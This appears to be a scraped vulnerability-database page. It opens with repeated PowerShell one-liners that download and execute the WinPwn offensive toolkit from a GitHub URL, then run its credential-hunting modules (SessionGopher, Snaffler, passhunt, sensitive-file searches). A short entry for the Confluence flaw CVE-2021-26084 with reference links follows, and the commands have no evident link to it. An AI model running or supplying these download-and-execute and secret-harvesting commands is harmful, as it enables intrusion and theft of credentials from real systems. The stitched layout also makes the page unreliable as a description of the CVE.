iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-26084 |
| jira.atlassian.com |
GitHub CVE
x_refsource_MISC
|
https://jira.atlassian.com/browse/CONFSERVER-67940 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26084 |